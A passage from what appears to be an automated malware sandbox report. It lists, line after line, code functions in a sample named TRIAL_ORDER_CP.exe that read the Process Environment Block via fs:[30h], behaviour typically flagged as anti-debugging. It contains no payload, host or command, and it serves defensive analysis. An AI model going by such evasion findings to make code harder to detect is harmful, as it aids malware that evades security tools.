        Source: C:\Users\user\Desktop\TRIAL_ORDER_CP.exeCode function: 3_2_33B1A2E0 mov eax, dword ptr fs:[00000030h]3_2_33B1A2E0
        Source: C:\Users\user\Desktop\TRIAL_ORDER_CP.exeCode function: 3_2_33B1A2E0 mov eax, dword ptr fs:[00000030h]3_2_33B1A2E0
        Source: C:\Users\user\Desktop\TRIAL_ORDER_CP.exeCode function: 3_2_33B1A2E0 mov eax, dword ptr fs:[00000030h]3_2_33B1A2E0
        Source: C:\Users\user\Desktop\TRIAL_ORDER_CP.exeCode function: 3_2_33B1A2E0 mov eax, dword ptr fs:[00000030h]3_2_33B1A2E0
        Source: C:\Users\user\Desktop\TRIAL_ORDER_CP.exeCode function: 3_2_33B182E0 mov eax, dword ptr fs:[00000030h]3_2_33B182E0
        Source: C:\Users\user\Desktop\TRIAL_ORDER_CP.exeCode function: 3_2_33B182E0 mov eax, dword ptr fs:[00000030h]3_2_33B182E0
        Source: C:\Users\user\Desktop\TRIAL_ORDER_CP.exeCode function: 3_2_33B182E0 mov eax, dword ptr fs:[00000030h]3_2_33B182E0
        Source: C:\Users\user\Desktop\TRIAL_ORDER_CP.exeCode function: 3_2_33B182E0 mov eax, dword ptr fs:[00000030h]3_2_33B182E0
        Source: C:\Users\user\Desktop\TRIAL_ORDER_CP.exeCode function: 3_2_33B0D2EC mov eax, dword ptr fs:[00000030h]3_2_33B0D2EC
        Source: C:\Users\user\Desktop\TRIAL_ORDER_CP.exeCode function: 3_2_33B0D2EC mov eax, dword ptr fs:[00000030h]3_2_33B0D2EC
        Source: C:\Users\user\Desktop\TRIAL_ORDER_CP.exeCode function: 3_2_33B432C0 mov eax, dword ptr fs:[00000030h]3_2_33B432C0
        Source: C:\Users\user\Desktop\TRIAL_ORDER_CP.exeCode function: 3_2_33B432C0 mov eax, dword ptr fs:[00000030h]3_2_33B432C0
        Source: C:\Users\user\Desktop\TRIAL_ORDER_CP.exeCode function: 3_2_33B332C5 mov eax, dword ptr fs:[00000030h]3_2_33B332C5
        Source: C:\Users\user\Desktop\TRIAL_ORDER_CP.exeCode function: 3_2_33B30230 mov ecx, dword ptr fs:[00000030h]3_2_33B30230
        Source: C:\Users\user\Desktop\TRIAL_ORDER_CP.exeCode function: 3_2_33B90227 mov eax, dword ptr fs:[00000030h]3_2_33B90227
        Source: C:\Users\user\Desktop\TRIAL_ORDER_CP.exeCode function: 3_2_33B90227 mov eax, dword ptr fs:[00000030h]3_2_33B90227
        Source: C:\Users\user\Desktop\TRIAL_ORDER_CP.exeCode function: 3_2_33B90227 mov eax, dword ptr fs:[00000030h]3_2_33B90227
        Source: C:\Users\user\Desktop\TRIAL_ORDER_CP.exeCode function: 3_2_33B4A22B mov eax, dword ptr fs:[00000030h]3_2_33B4A22B
        Source: C:\Users\user\Desktop\TRIAL_ORDER_CP.exeCode function: 3_2_33B4A22B mov eax, dword ptr fs:[00000030h]3_2_33B4A22B
        Source: C:\Users\user\Desktop\TRIAL_ORDER_CP.exeCode function: 3_2_33B4A22B mov eax, dword ptr fs:[00000030h]3_2_33B4A22B
        Source: C:\Users\user\Desktop\TRIAL_ORDER_CP.exeCode function: 3_2_33B0821B mov eax, dword ptr fs:[00000030h]3_2_33B0821B
        Source: C:\Users\user\Desktop\TRIAL_ORDER_CP.exeCode function: 3_2_33B9B214 mov eax, dword ptr fs:[00000030h]3_2_33B9B214
        Source: C:\Users\user\Desktop\TRIAL_ORDER_CP.exeCode function: 3_2_33B9B214 mov eax, dword ptr fs:[00000030h]3_2_33B9B214
        Source: C:\Users\user\Desktop\TRIAL_ORDER_CP.exeCode function: 3_2_33B0A200 mov eax, dword ptr fs:[00000030h]3_2_33B0A200
        Source: C:\Users\user\Desktop\TRIAL_ORDER_CP.exeCode function: 3_2_33B0B273 mov eax, dword ptr fs:[00000030h]3_2_33B0B273
        Source: C:\Users\user\Desktop\TRIAL_ORDER_CP.exeCode function: 3_2_33B0B273 mov eax, dword ptr fs:[00000030h]3_2_33B0B273
        Source: C:\Users\user\Desktop\TRIAL_ORDER_CP.exeCode function: 3_2_33B0B273 mov eax, dword ptr fs:[00000030h]3_2_33B0B273
        Source: C:\Users\user\Desktop\TRIAL_ORDER_CP.exeCode function: 3_2_33BA327E mov eax, dword ptr fs:[00000030h]3_2_33BA327E
        Source: C:\Users\user\Desktop\TRIAL_ORDER_CP.exeCode function: 3_2_33BA327E mov eax, dword ptr fs:[00000030h]3_2_33BA327E
        Source: C:\Users\user\Desktop\TRIAL_ORDER_CP.exeCode function: 3_2_33BA327E mov eax, dword ptr fs:[00000030h]3_2_33BA327E
        Source: C:\Users\user\Desktop\TRIAL_ORDER_CP.exeCode function: 3_2_33BA327E mov eax, dword ptr fs:[00000030h]3_2_33BA327E
        Source: C:\Users\user\Desktop\TRIAL_ORDER_CP.exeCode function: 3_2_33BA327E mov eax, dword ptr fs:[00000030h]3_2_33BA327E
        Source: C:\Users\user\Desktop\TRIAL_ORDER_CP.exeCode function: 3_2_33BA327E mov eax, dword ptr fs:[00000030h]3_2_33BA327E
        Source: C:\Users\user\Desktop\TRIAL_ORDER_CP.exeCode function: 3_2_33BCD270 mov eax, dword ptr fs:[00000030h]3_2_33BCD270
        Source: C:\Users\user\Desktop\TRIAL_ORDER_CP.exeCode function: 3_2_33B8D250 mov eax, dword ptr fs:[00000030h]3_2_33B8D250
        Source: C:\Users\user\Desktop\TRIAL_ORDER_CP.exeCode function: 3_2_33B8D250 mov ecx, dword ptr fs:[00000030h]3_2_33B8D250
        Source: C:\Users\user\Desktop\TRIAL_ORDER_CP.exeCode function: 3_2_33BD124C mov eax, dword ptr fs:[00000030h]3_2_33BD124C
        Source: C:\Users\user\Desktop\TRIAL_ORDER_CP.exeCode function: 3_2_33BD124C mov eax, dword ptr fs:[00000030h]3_2_33BD124C
        Source: C:\Users\user\Desktop\TRIAL_ORDER_CP.exeCode function: 3_2_33BD124C mov eax, dword ptr fs:[00000030h]3_2_33BD124C
        Source: C:\Users\user\Desktop\TRIAL_ORDER_CP.exeCode function: 3_2_33BD124C mov eax, dword ptr fs:[00000030h]3_2_33BD124C
        Source: C:\Users\user\Desktop\TRIAL_ORDER_CP.exeCode function: 3_2_33B3F24A mov eax, dword ptr fs:[00000030h]3_2_33B3F24A
        Source: C:\Users\user\Desktop\TRIAL_ORDER_CP.exeCode function: 3_2_33BCF247 mov eax, dword ptr fs:[00000030h]3_2_33BCF247
        Source: C:\Users\user\Desktop\TRIAL_ORDER_CP.exeCode function: 3_2_33BE51B6 mov eax, dword ptr fs:[00000030h]3_2_33BE51B6
        Source: C:\Users\user\Desktop\TRIAL_ORDER_CP.exeCode function: 3_2_33B431BE mov eax, dword ptr fs:[00000030h]3_2_33B431BE
        Source: C:\Users\user\Desktop\TRIAL_ORDER_CP.exeCode function: 3_2_33B431BE mov eax, dword ptr fs:[00000030h]3_2_33B431BE
        Source: C:\Users\user\Desktop\TRIAL_ORDER_CP.exeCode function: 3_2_33B441BB mov ecx, dword ptr fs:[00000030h]3_2_33B441BB
        Source: C:\Users\user\Desktop\TRIAL_ORDER_CP.exeCode function: 3_2_33B441BB mov eax, dword ptr fs:[00000030h]3_2_33B441BB
        Source: C:\Users\user\Desktop\TRIAL_ORDER_CP.exeCode function: 3_2_33B441BB mov eax, dword ptr fs:[00000030h]3_2_33B441BB
        Source: C:\Users\user\Desktop\TRIAL_ORDER_CP.exeCode function: 3_2_33B4E1A4 mov eax, dword ptr fs:[00000030h]3_2_33B4E1A4
        Source: C:\Users\user\Desktop\TRIAL_ORDER_CP.exeCode function: 3_2_33B4E1A4 mov eax, dword ptr fs:[00000030h]3_2_33B4E1A4
        Source: C:\Users\user\Desktop\TRIAL_ORDER_CP.exeCode function: 3_2_33B51190 mov eax, dword ptr fs:[00000030h]3_2_33B51190
        Source: C:\Users\user\Desktop\TRIAL_ORDER_CP.exeCode function: 3_2_33B51190 mov eax, dword ptr fs:[00000030h]3_2_33B51190
        Source: C:\Users\user\Desktop\TRIAL_ORDER_CP.exeCode function: 3_2_33B39194 mov eax, dword ptr fs:[00000030h]3_2_33B39194
        Source: C:\Users\user\Desktop\TRIAL_ORDER_CP.exeCode function: 3_2_33B14180 mov eax, dword ptr fs:[00000030h]3_2_33B14180
        Source: C:\Users\user\Desktop\TRIAL_ORDER_CP.exeCode function: 3_2_33B14180 mov eax, dword ptr fs:[00000030h]3_2_33B14180
        Source: C:\Users\user\Desktop\TRIAL_ORDER_CP.exeCode function: 3_2_33B14180 mov eax, dword ptr fs:[00000030h]3_2_33B14180
        Source: C:\Users\user\Desktop\TRIAL_ORDER_CP.exeCode function: 3_2_33B091F0 mov eax, dword ptr fs:[00000030h]3_2_33B091F0
        Source: C:\Users\user\Desktop\TRIAL_ORDER_CP.exeCode function: 3_2_33B091F0 mov eax, dword ptr fs:[00000030h]3_2_33B091F0
        Source: C:\Users\user\Desktop\TRIAL_ORDER_CP.exeCode function: 3_2_33B201F1 mov eax, dword ptr fs:[00000030h]3_2_33B201F1
        Source: C:\Users\user\Desktop\TRIAL_ORDER_CP.exeCode function: 3_2_33B201F1 mov eax, dword ptr fs:[00000030h]3_2_33B201F1
        Source: C:\Users\user\Desktop\TRIAL_ORDER_CP.exeCode function: 3_2_33B201F1 mov eax, dword ptr fs:[00000030h]3_2_33B201F1
        Source: C:\Users\user\Desktop\TRIAL_ORDER_CP.exeCode function: 3_2_33B3F1F0 mov eax, dword ptr fs:[00000030h]3_2_33B3F1F0
        Source: C:\Users\user\Desktop\TRIAL_ORDER_CP.exeCode function: 3_2_33B3F1F0 mov eax, dword ptr fs:[00000030h]3_2_33B3F1F0
        Source: C:\Users\user\Desktop\TRIAL_ORDER_CP.exeCode function: 3_2_33B1A1E3 mov eax, dword ptr fs:[00000030h]3_2_33B1A1E3
        Source: C:\Users\user\Desktop\TRIAL_ORDER_CP.exeCode function: 3_2_33B1A1E3 mov eax, dword ptr fs:[00000030h]3_2_33B1A1E3
        Source: C:\Users\user\Desktop\TRIAL_ORDER_CP.exeCode function: 3_2_33B1A1E3 mov eax, dword ptr fs:[00000030h]3_2_33B1A1E3
        Source: C:\Users\user\Desktop\TRIAL_ORDER_CP.exeCode function: 3_2_33B1A1E3 mov eax, dword ptr fs:[00000030h]3_2_33B1A1E3
        Source: C:\Users\user\Desktop\TRIAL_ORDER_CP.exeCode function: 3_2_33B1A1E3 mov eax, dword ptr fs:[00000030h]3_2_33B1A1E3
        Source: C:\Users\user\Desktop\TRIAL_ORDER_CP.exeCode function: 3_2_33BD81EE mov eax, dword ptr fs:[00000030h]3_2_33BD81EE
        Source: C:\Users\user\Desktop\TRIAL_ORDER_CP.exeCode function: 3_2_33BD81EE mov eax, dword ptr fs:[00000030h]3_2_33BD81EE
        Source: C:\Users\user\Desktop\TRIAL_ORDER_CP.exeCode function: 3_2_33B3B1E0 mov eax, dword ptr fs:[00000030h]3_2_33B3B1E0
        Source: C:\Users\user\Desktop\TRIAL_ORDER_CP.exeCode function: 3_2_33B3B1E0 mov eax, dword ptr fs:[00000030h]3_2_33B3B1E0
        Source: C:\Users\user\Desktop\TRIAL_ORDER_CP.exeCode function: 3_2_33B3B1E0 mov eax, dword ptr fs:[00000030h]3_2_33B3B1E0
        Source: C:\Users\user\Desktop\TRIAL_ORDER_CP.exeCode function: 3_2_33B3B1E0 mov eax, dword ptr fs:[00000030h]3_2_33B3B1E0
        Source: C:\Users\user\Desktop\TRIAL_ORDER_CP.exeCode function: 3_2_33B3B1E0 mov eax, dword ptr fs:[00000030h]3_2_33B3B1E0
        Source: C:\Users\user\Desktop\TRIAL_ORDER_CP.exeCode function: 3_2_33B3B1E0 mov eax, dword ptr fs:[00000030h]3_2_33B3B1E0
        Source: C:\Users\user\Desktop\TRIAL_ORDER_CP.exeCode function: 3_2_33B3B1E0 mov eax, dword ptr fs:[00000030h]3_2_33B3B1E0
        Source: C:\Users\user\Desktop\TRIAL_ORDER_CP.exeCode function: 3_2_33B191E5 mov eax, dword ptr fs:[00000030h]3_2_33B191E5
        Source: C:\Users\user\Desktop\TRIAL_ORDER_CP.exeCode function: 3_2_33B191E5 mov eax, dword ptr fs:[00000030h]3_2_33B191E5
        Source: C:\Users\user\Desktop\TRIAL_ORDER_CP.exeCode function: 3_2_33B081EB mov eax, dword ptr fs:[00000030h]3_2_33B081EB
        Source: C:\Users\user\Desktop\TRIAL_ORDER_CP.exeCode function: 3_2_33B201C0 mov eax, dword ptr fs:[00000030h]3_2_33B201C0
        Source: C:\Users\user\Desktop\TRIAL_ORDER_CP.exeCode function: 3_2_33B201C0 mov eax, dword ptr fs:[00000030h]3_2_33B201C0
        Source: C:\Users\user\Desktop\TRIAL_ORDER_CP.exeCode function: 3_2_33B251C0 mov eax, dword ptr fs:[00000030h]3_2_33B251C0
        Source: C:\Users\user\Desktop\TRIAL_ORDER_CP.exeCode function: 3_2_33B251C0 mov eax, dword ptr fs:[00000030h]3_2_33B251C0
        Source: C:\Users\user\Desktop\TRIAL_ORDER_CP.exeCode function: 3_2_33B251C0 mov eax, dword ptr fs:[00000030h]3_2_33B251C0
        Source: C:\Users\user\Desktop\TRIAL_ORDER_CP.exeCode function: 3_2_33B251C0 mov eax, dword ptr fs:[00000030h]3_2_33B251C0
        Source: C:\Users\user\Desktop\TRIAL_ORDER_CP.exeCode function: 3_2_33BCF13E mov eax, dword ptr fs:[00000030h]3_2_33BCF13E
        Source: C:\Users\user\Desktop\TRIAL_ORDER_CP.exeCode function: 3_2_33B9A130 mov eax, dword ptr fs:[00000030h]3_2_33B9A130
        Source: C:\Users\user\Desktop\TRIAL_ORDER_CP.exeCode function: 3_2_33B47128 mov eax, dword ptr fs:[00000030h]3_2_33B47128
        Source: C:\Users\user\Desktop\TRIAL_ORDER_CP.exeCode function: 3_2_33B47128 mov eax, dword ptr fs:[00000030h]3_2_33B47128
        Source: C:\Users\user\Desktop\TRIAL_ORDER_CP.exeCode function: 3_2_33B0F113 mov eax, dword ptr fs:[00000030h]3_2_33B0F113
        Source: C:\Users\user\Desktop\TRIAL_ORDER_CP.exeCode function: 3_2_33B0F113 mov eax, dword ptr fs:[00000030h]3_2_33B0F113
        Source: C:\Users\user\Desktop\TRIAL_ORDER_CP.exeCode function: 3_2_33B0F113 mov eax, dword ptr fs:[00000030h]3_2_33B0F113
        Source: C:\Users\user\Desktop\TRIAL_ORDER_CP.exeCode function: 3_2_33B0F113 mov eax, dword ptr fs:[00000030h]3_2_33B0F113
        Source: C:\Users\user\Desktop\TRIAL_ORDER_CP.exeCode function: 3_2_33B0F113 mov eax, dword ptr fs:[00000030h]3_2_33B0F113
        Source: C:\Users\user\Desktop\TRIAL_ORDER_CP.exeCode function: 3_2_33B0F113 mov eax, dword ptr fs:[00000030h]3_2_33B0F113
        Source: C:\Users\user\Desktop\TRIAL_ORDER_CP.exeCode function: 3_2_33B0F113 mov eax, dword ptr fs:[00000030h]3_2_33B0F113
        Source: C:\Users\user\Desktop\TRIAL_ORDER_CP.exeCode function: 3_2_33B0F113 mov eax, dword ptr fs:[00000030h]3_2_33B0F113
        Source: C:\Users\user\Desktop\TRIAL_ORDER_CP.exeCode function: 3_2_33B0F113 mov eax, dword ptr fs:[00000030h]3_2_33B0F113
        Source: C:\Users\user\Desktop\TRIAL_ORDER_CP.exeCode function: 3_2_33B0F113 mov eax, dword ptr fs:[00000030h]3_2_33B0F113
        Source: C:\Users\user\Desktop\TRIAL_ORDER_CP.exeCode function: 3_2_33B0F113 mov eax, dword ptr fs:[00000030h]3_2_33B0F113
        Source: C:\Users\user\Desktop\TRIAL_ORDER_CP.exeCode function: 3_2_33B0F113 mov eax, dword ptr fs:[00000030h]3_2_33B0F113
        Source: C:\Users\user\Desktop\TRIAL_ORDER_CP.exeCode function: 3_2_33B0F113 mov eax, dword ptr fs:[00000030h]3_2_33B0F113
        Source: C:\Users\user\Desktop\TRIAL_ORDER_CP.exeCode function: 3_2_33B0F113 mov eax, dword ptr fs:[00000030h]3_2_33B0F113
        Source: C:\Users\user\Desktop\TRIAL_ORDER_CP.exeCode function: 3_2_33B0F113 mov eax, dword ptr fs:[00000030h]3_2_33B0F113
        Source: C:\Users\user\Desktop\TRIAL_ORDER_CP.exeCode function: 3_2_33B0F113 mov eax, dword ptr fs:[00000030h]3_2_33B0F113
        Source: C:\Users\user\Desktop\TRIAL_ORDER_CP.exeCode function: 3_2_33B0F113 mov eax, dword ptr fs:[00000030h]3_2_33B0F113
        Source: C:\Users\user\Desktop\TRIAL_ORDER_CP.exeCode function: 3_2_33B0F113 mov eax, dword ptr fs:[00000030h]3_2_33B0F113
        Source: C:\Users\user\Desktop\TRIAL_ORDER_CP.exeCode function: 3_2_33B0F113 mov eax, dword ptr fs:[00000030h]3_2_33B0F113
        Source: C:\Users\user\Desktop\TRIAL_ORDER_CP.exeCode function: 3_2_33B0F113 mov eax, dword ptr fs:[00000030h]3_2_33B0F113
        Source: C:\Users\user\Desktop\TRIAL_ORDER_CP.exeCode function: 3_2_33B0F113 mov eax, dword ptr fs:[00000030h]3_2_33B0F113
        Source: C:\Users\user\Desktop\TRIAL_ORDER_CP.exeCode function: 3_2_33B40118 mov eax, dword ptr fs:[00000030h]3_2_33B40118
        Source: C:\Users\user\Desktop\TRIAL_ORDER_CP.exeCode function: 3_2_33B3510F mov eax, dword ptr fs:[00000030h]3_2_33B3510F
        Source: C:\Users\user\Desktop\TRIAL_ORDER_CP.exeCode function: 3_2_33B3510F mov eax, dword ptr fs:[00000030h]3_2_33B3510F
        Source: C:\Users\user\Desktop\TRIAL_ORDER_CP.exeCode function: 3_2_33B3510F mov eax, dword ptr fs:[00000030h]3_2_33B3510F
        Source: C:\Users\user\Desktop\TRIAL_ORDER_CP.exeCode function: 3_2_33B3510F mov eax, dword ptr fs:[00000030h]3_2_33B3510F
        Source: C:\Users\user\Desktop\TRIAL_ORDER_CP.exeCode function: 3_2_33B3510F mov eax, dword ptr fs:[00000030h]3_2_33B3510F
        Source: C:\Users\user\Desktop\TRIAL_ORDER_CP.exeCode function: 3_2_33B3510F mov eax, dword ptr fs:[00000030h]3_2_33B3510F
        Source: C:\Users\user\Desktop\TRIAL_ORDER_CP.exeCode function: 3_2_33B3510F mov eax, dword ptr fs:[00000030h]3_2_33B3510F
        Source: C:\Users\user\Desktop\TRIAL_ORDER_CP.exeCode function: 3_2_33B3510F mov eax, dword ptr fs:[00000030h]3_2_33B3510F
        Source: C:\Users\user\Desktop\TRIAL_ORDER_CP.exeCode function: 3_2_33B3510F mov eax, dword ptr fs:[00000030h]3_2_33B3510F
        Source: C:\Users\user\Desktop\TRIAL_ORDER_CP.exeCode function: 3_2_33B3510F mov eax, dword ptr fs:[00000030h]3_2_33B3510F
        Source: C:\Users\user\Desktop\TRIAL_ORDER_CP.exeCode function: 3_2_33B3510F mov eax, dword ptr fs:[00000030h]3_2_33B3510F
        Source: C:\Users\user\Desktop\TRIAL_ORDER_CP.exeCode function: 3_2_33B3510F mov eax, dword ptr fs:[00000030h]3_2_33B3510F
        Source: C:\Users\user\Desktop\TRIAL_ORDER_CP.exeCode function: 3_2_33B3510F mov eax, dword ptr fs:[00000030h]3_2_33B3510F
        Source: C:\Users\user\Desktop\TRIAL_ORDER_CP.exeCode function: 3_2_33B1510D mov eax, dword ptr fs:[00000030h]3_2_33B1510D
        Source: C:\Users\user\Desktop\TRIAL_ORDER_CP.exeCode function: 3_2_33B16179 mov eax, dword ptr fs:[00000030h]3_2_33B16179
        Source: C:\Users\user\Desktop\TRIAL_ORDER_CP.exeCode function: 3_2_33B6717A mov eax, dword ptr fs:[00000030h]3_2_33B6717A
        Source: C:\Users\user\Desktop\TRIAL_ORDER_CP.exeCode function: 3_2_33B6717A mov eax, dword ptr fs:[00000030h]3_2_33B6717A
        Source: C:\Users\user\Desktop\TRIAL_ORDER_CP.exeCode function: 3_2_33B4716D mov eax, dword ptr fs:[00000030h]3_2_33B4716D
        Source: C:\Users\user\Desktop\TRIAL_ORDER_CP.exeCode function: 3_2_33BE3157 mov eax, dword ptr fs:[00000030h]3_2_33BE3157
        Source: C:\Users\user\Desktop\TRIAL_ORDER_CP.exeCode function: 3_2_33BE3157 mov eax, dword ptr fs:[00000030h]3_2_33BE3157
        Source: C:\Users\user\Desktop\TRIAL_ORDER_CP.exeCode function: 3_2_33BE3157 mov eax, dword ptr fs:[00000030h]3_2_33BE3157
        Source: C:\Users\user\Desktop\TRIAL_ORDER_CP.exeCode function: 3_2_33BE3157 mov eax, dword ptr fs:[00000030h]3_2_33BE3157
        Source: C:\Users\user\Desktop\TRIAL_ORDER_CP.exeCode function: 3_2_33B4415F mov eax, dword ptr fs:[00000030h]3_2_33B4415F
        Source: C:\Users\user\Desktop\TRIAL_ORDER_CP.exeCode function: 3_2_33BA314A mov eax, dword ptr fs:[00000030h]3_2_33BA314A
        Source: C:\Users\user\Desktop\TRIAL_ORDER_CP.exeCode function: 3_2_33BA314A mov eax, dword ptr fs:[00000030h]3_2_33BA314A
        Source: C:\Users\user\Desktop\TRIAL_ORDER_CP.exeCode function: 3_2_33BA314A mov eax, dword ptr fs:[00000030h]3_2_33BA314A
        Source: C:\Users\user\Desktop\TRIAL_ORDER_CP.exeCode function: 3_2_33BA314A mov eax, dword ptr fs:[00000030h]3_2_33BA314A
        Source: C:\Users\user\Desktop\TRIAL_ORDER_CP.exeCode function: 3_2_33BE5149 mov eax, dword ptr fs:[00000030h]3_2_33BE5149
        Source: C:\Users\user\Desktop\TRIAL_ORDER_CP.exeCode function: 3_2_33B0A147 mov eax, dword ptr fs:[00000030h]3_2_33B0A147
        Source: C:\Users\user\Desktop\TRIAL_ORDER_CP.exeCode function: 3_2_33B0A147 mov eax, dword ptr fs:[00000030h]3_2_33B0A147
        Source: C:\Users\user\Desktop\TRIAL_ORDER_CP.exeCode function: 3_2_33B0A147 mov eax, dword ptr fs:[00000030h]3_2_33B0A147
        Source: C:\Users\user\Desktop\TRIAL_ORDER_CP.exeCode function: 3_2_33BE50B7 mov eax, dword ptr fs:[00000030h]3_2_33BE50B7
        Source: C:\Users\user\Desktop\TRIAL_ORDER_CP.exeCode function: 3_2_33BCB0AF mov eax, dword ptr fs:[00000030h]3_2_33BCB0AF
        Source: C:\Users\user\Desktop\TRIAL_ORDER_CP.exeCode function: 3_2_33BBF0A5 mov eax, dword ptr fs:[00000030h]3_2_33BBF0A5
        Source: C:\Users\user\Desktop\TRIAL_ORDER_CP.exeCode function: 3_2_33BBF0A5 mov eax, dword ptr fs:[00000030h]3_2_33BBF0A5
        Source: C:\Users\user\Desktop\TRIAL_ORDER_CP.exeCode function: 3_2_33BBF0A5 mov eax, dword ptr fs:[00000030h]3_2_33BBF0A5
        Source: C:\Users\user\Desktop\TRIAL_ORDER_CP.exeCode function: 3_2_33BBF0A5 mov eax, dword ptr fs:[00000030h]3_2_33BBF0A5
        Source: C:\Users\user\Desktop\TRIAL_ORDER_CP.exeCode function: 3_2_33BBF0A5 mov eax, dword ptr fs:[00000030h]3_2_33BBF0A5
        Source: C:\Users\user\Desktop\TRIAL_ORDER_CP.exeCode function: 3_2_33BBF0A5 mov eax, dword ptr fs:[00000030h]3_2_33BBF0A5
        Source: C:\Users\user\Desktop\TRIAL_ORDER_CP.exeCode function: 3_2_33BBF0A5 mov eax, dword ptr fs:[00000030h]3_2_33BBF0A5
        Source: C:\Users\user\Desktop\TRIAL_ORDER_CP.exeCode function: 3_2_33B0C090 mov eax, dword ptr fs:[00000030h]3_2_33B0C090
        Source: C:\Users\user\Desktop\TRIAL_ORDER_CP.exeCode function: 3_2_33B0A093 mov ecx, dword ptr fs:[00000030h]3_2_33B0A093
        Source: C:\Users\user\Desktop\TRIAL_ORDER_CP.exeCode function: 3_2_33BE4080 mov eax, dword ptr fs:[00000030h]3_2_33BE4080
        Source: C:\Users\user\Desktop\TRIAL_ORDER_CP.exeCode function: 3_2_33BE4080 mov eax, dword ptr fs:[00000030h]3_2_33BE4080
        Source: C:\Users\user\Desktop\TRIAL_ORDER_CP.exeCode function: 3_2_33BE4080 mov eax, dword ptr fs:[00000030h]3_2_33BE4080
        Source: C:\Users\user\Desktop\TRIAL_ORDER_CP.exeCode function: 3_2_33BE4080 mov eax, dword ptr fs:[00000030h]3_2_33BE4080
        Source: C:\Users\user\Desktop\TRIAL_ORDER_CP.exeCode function: 3_2_33BE4080 mov eax, dword ptr fs:[00000030h]3_2_33BE4080
        Source: C:\Users\user\Desktop\TRIAL_ORDER_CP.exeCode function: 3_2_33BE4080 mov eax, dword ptr fs:[00000030h]3_2_33BE4080
        Source: C:\Users\user\Desktop\TRIAL_ORDER_CP.exeCode function: 3_2_33BE4080 mov eax, dword ptr fs:[00000030h]3_2_33BE4080
        Source: C:\Users\user\Desktop\TRIAL_ORDER_CP.exeCode function: 3_2_33B4D0F0 mov eax, dword ptr fs:[00000030h]3_2_33B4D0F0
        Source: C:\Users\user\Desktop\TRIAL_ORDER_CP.exeCode function: 3_2_33B4D0F0 mov ecx, dword ptr fs:[00000030h]3_2_33B4D0F0
        Source: C:\Users\user\Desktop\TRIAL_ORDER_CP.exeCode function: 3_2_33B0C0F6 mov eax, dword ptr fs:[00000030h]3_2_33B0C0F6
        Source: C:\Users\user\Desktop\TRIAL_ORDER_CP.exeCode function: 3_2_33B090F8 mov eax, dword ptr fs:[00000030h]3_2_33B090F8
        Source: C:\Users\user\Desktop\TRIAL_ORDER_CP.exeCode function: 3_2_33B090F8 mov eax, dword ptr fs:[00000030h]3_2_33B090F8
        Source: C:\Users\user\Desktop\TRIAL_ORDER_CP.exeCode function: 3_2_33B090F8 mov eax, dword ptr fs:[00000030h]3_2_33B090F8
        Source: C:\Users\user\Desktop\TRIAL_ORDER_CP.exeCode function: 3_2_33B090F8 mov eax, dword ptr fs:[00000030h]3_2_33B090F8
        Source: C:\Users\user\Desktop\TRIAL_ORDER_CP.exeCode function: 3_2_33B2B0D0 mov eax, dword ptr fs:[00000030h]3_2_33B2B0D0
        Source: C:\Users\user\Desktop\TRIAL_ORDER_CP.exeCode function: 3_2_33B0B0D6 mov eax, dword ptr fs:[00000030h]3_2_33B0B0D6
        Source: C:\Users\user\Desktop\TRIAL_ORDER_CP.exeCode function: 3_2_33B0B0D6 mov eax, dword ptr fs:[00000030h]3_2_33B0B0D6
        Source: C:\Users\user\Desktop\TRIAL_ORDER_CP.exeCode function: 3_2_33B0B0D6 mov eax, dword ptr fs:[00000030h]3_2_33B0B0D6
        Source: C:\Users\user\Desktop\TRIAL_ORDER_CP.exeCode function: 3_2_33B0B0D6 mov eax, dword ptr fs:[00000030h]3_2_33B0B0D6
        Source: C:\Users\user\Desktop\TRIAL_ORDER_CP.exeCode function: 3_2_33B0D02D mov eax, dword ptr fs:[00000030h]3_2_33B0D02D
        Source: C:\Users\user\Desktop\TRIAL_ORDER_CP.exeCode function: 3_2_33B52010 mov ecx, dword ptr fs:[00000030h]3_2_33B52010
        Source: C:\Users\user\Desktop\TRIAL_ORDER_CP.exeCode function: 3_2_33B35004 mov eax, dword ptr fs:[00000030h]3_2_33B35004
        Source: C:\Users\user\Desktop\TRIAL_ORDER_CP.exeCode function: 3_2_33B35004 mov ecx, dword ptr fs:[00000030h]3_2_33B35004
        Source: C:\Users\user\Desktop\TRIAL_ORDER_CP.exeCode function: 3_2_33B18009 mov eax, dword ptr fs:[00000030h]3_2_33B18009
        Source: C:\Users\user\Desktop\TRIAL_ORDER_CP.exeCode function: 3_2_33B16074 mov eax, dword ptr fs:[00000030h]3_2_33B16074
        Source: C:\Users\user\Desktop\TRIAL_ORDER_CP.exeCode function: 3_2_33B16074 mov eax, dword ptr fs:[00000030h]3_2_33B16074
        Source: C:\Users\user\Desktop\TRIAL_ORDER_CP.exeCode function: 3_2_33BB9060 mov eax, dword ptr fs:[00000030h]3_2_33BB9060
        Source: C:\Users\user\Desktop\TRIAL_ORDER_CP.exeCode function: 3_2_33B11051 mov eax, dword ptr fs:[00000030h]3_2_33B11051
        Source: C:\Users\user\Desktop\TRIAL_ORDER_CP.exeCode function: 3_2_33B11051 mov eax, dword ptr fs:[00000030h]3_2_33B11051
        Source: C:\Users\user\Desktop\TRIAL_ORDER_CP.exeCode function: 3_2_33BE505B mov eax, dword ptr fs:[00000030h]3_2_33BE505B
        Source: C:\Users\user\Desktop\TRIAL_ORDER_CP.exeCode function: 3_2_33B40044 mov eax, dword ptr fs:[00000030h]3_2_33B40044
        Source: C:\Users\user\Desktop\TRIAL_ORDER_CP.exeCode function: 3_2_33BE17BC mov eax, dword ptr fs:[00000030h]3_2_33BE17BC
        Source: C:\Users\user\Desktop\TRIAL_ORDER_CP.exeCode function: 3_2_33B107A7 mov eax, dword ptr fs:[00000030h]3_2_33B107A7
        Source: C:\Users\user\Desktop\TRIAL_ORDER_CP.exeCode function: 3_2_33BDD7A7 mov eax, dword ptr fs:[00000030h]3_2_33BDD7A7
        Source: C:\Users\user\Desktop\TRIAL_ORDER_CP.exeCode function: 3_2_33BDD7A7 mov eax, dword ptr fs:[00000030h]3_2_33BDD7A7
        Source: C:\Users\user\Desktop\TRIAL_ORDER_CP.exeCode function: 3_2_33BDD7A7 mov eax, dword ptr fs:[00000030h]3_2_33BDD7A7
        Source: C:\Users\user\Desktop\TRIAL_ORDER_CP.exeCode function: 3_2_33B41796 mov eax, dword ptr fs:[00000030h]3_2_33B41796
        Source: C:\Users\user\Desktop\TRIAL_ORDER_CP.exeCode function: 3_2_33B41796 mov eax, dword ptr fs:[00000030h]3_2_33B41796
        Source: C:\Users\user\Desktop\TRIAL_ORDER_CP.exeCode function: 3_2_33B8E79D mov eax, dword ptr fs:[00000030h]3_2_33B8E79D
